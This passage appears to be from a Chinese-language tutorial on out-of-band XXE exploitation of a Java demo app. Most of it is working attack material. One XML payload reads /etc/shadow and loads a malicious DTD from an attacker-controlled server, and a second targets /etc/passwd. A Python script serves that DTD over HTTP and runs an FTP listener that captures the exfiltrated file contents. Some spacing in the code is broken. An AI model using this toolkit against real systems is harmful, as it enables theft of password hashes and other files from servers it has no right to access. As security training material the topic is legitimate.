λ mvn clean package [WARNING] [WARNING] Some problems were encountered while building the effective settings [WARNING] expected START_TAG or END_TAG not TEXT (position: TEXT seen ...</repositories>\n\u3000\u3000\u3000 <!-- \u63d2\u4ef6\u4ed3\u5e93 -->\n <p... @232:9) @ D:\Store\document\all_my_work\java_lib\apache-maven-3.5.0\bin\..\conf\settings.xml, line 232, column 9 [WARNING] [INFO] Scanning for projects... [INFO] [INFO] ------------------------------------------------------------------------ [INFO] Building xxedemo 0.0.1-SNAPSHOT [INFO] ------------------------------------------------------------------------ ... [INFO] ------------------------------------------------------------------------ [INFO] BUILD SUCCESS [INFO] ------------------------------------------------------------------------ [INFO] Total time: 10.617 s [INFO] Finished at: 2019-01-23T14:19:30+08:00 [INFO] Final Memory: 37M/324M [INFO] ------------------------------------------------------------------------
""" The XML Payload you should send to the server! <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/shadow"> <!ENTITY % dtd SYSTEM "http://x.x.x.x:8888/evil.dtd"> %dtd; ]> <data>&send;</data> """
payload = """<!ENTITY % all "<!ENTITY send SYSTEM 'ftp://{}:{}/%file;'>"> %all;"""
classWebServer(SocketServer.BaseRequestHandler): """ Request handler for our webserver. """
defhandle(self): """ Blanketly return the XML payload regardless of who's asking. """ resp = """HTTP/1.1 200 OK\r\nContent-Type: application/xml\r\nContent-length: {}\r\n\r\n{}\r\n\r\n""".format(len(payload), payload) # self.request is a TCP socket connected to the client self.data = self.request.recv(4096).strip() wlog("[WEB] {} Connected and sent:".format(self.client_address[0])) wlog("{}".format(self.data)) # Send back same data but upper self.request.sendall(resp) wlog("[WEB] Replied with:\n{}".format(resp))
classFTPServer(SocketServer.BaseRequestHandler): """ Request handler for our ftp. """
defhandle(self): """ FTP Java handler which can handle reading files and directories that are being sent by the server. """ # set timeout self.request.settimeout(10) wlog("[FTP] {} has connected".format(self.client_address[0])) self.request.sendall("220 xxe-ftp-server\n") try: whileTrue: self.data = self.request.recv(4096).strip() wlog("[FTP] Received:\n{}".format(self.data)) if"LIST"in self.data: self.request.sendall("drwxrwxrwx 1 owner group 1 Feb 21 04:37 rsl\n") self.request.sendall("150 Opening BINARY mode data connection for /bin/ls\n") self.request.sendall("226 Transfer complete.\n") elif"USER"in self.data: self.request.sendall("331 password please - version check\n") elif"PORT"in self.data: wlog("[FTP] ! PORT received") wlog("[FTP] > 200 PORT command ok") self.request.sendall("200 PORT command ok\n") elif"SYST"in self.data: self.request.sendall("215 RSL\n") else: wlog("[FTP] > 230 more data please!") self.request.sendall("230 more data please!\n") except Exception, e: if"timed out"in e: wlog("[FTP] Client timed out") else: wlog("[FTP] Client error: {}".format(e)) wlog("[FTP] Connection closed with {}".format(self.client_address[0]))
defstart_server(conn, serv_class): server = SocketServer.TCPServer(conn, serv_class) t = Thread(target=server.serve_forever) t.daemon = True t.start() if __name__ == "__main__": ifnot argv[1]: print"[-] Need public IP of this server in order to receive data." exit(1) WEB_ARGS = ("0.0.0.0", 8888) FTP_ARGS = ("0.0.0.0", 2121) payload = payload.format(argv[1],FTP_ARGS[1]) wlog("[WEB] Starting webserver on %s:%d..." % WEB_ARGS) start_server(WEB_ARGS, WebServer) wlog("[FTP] Starting FTP server on %s:%d..." % FTP_ARGS) start_server(FTP_ARGS, FTPServer) try: whileTrue: sleep(10000) except KeyboardInterrupt, e: print"\n[+] Server shutting down."
运行:
1 2 3
$ python xxeftp.py 127.0.0.1 [WEB] Starting webserver on 0.0.0.0:8888... [FTP] Starting FTP server on 0.0.0.0:2121...
发送payload,这次我们查看/etc/passwd:
1 2 3 4 5 6 7
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8888/evil.dtd"> %dtd; ]> <data>&send;</data>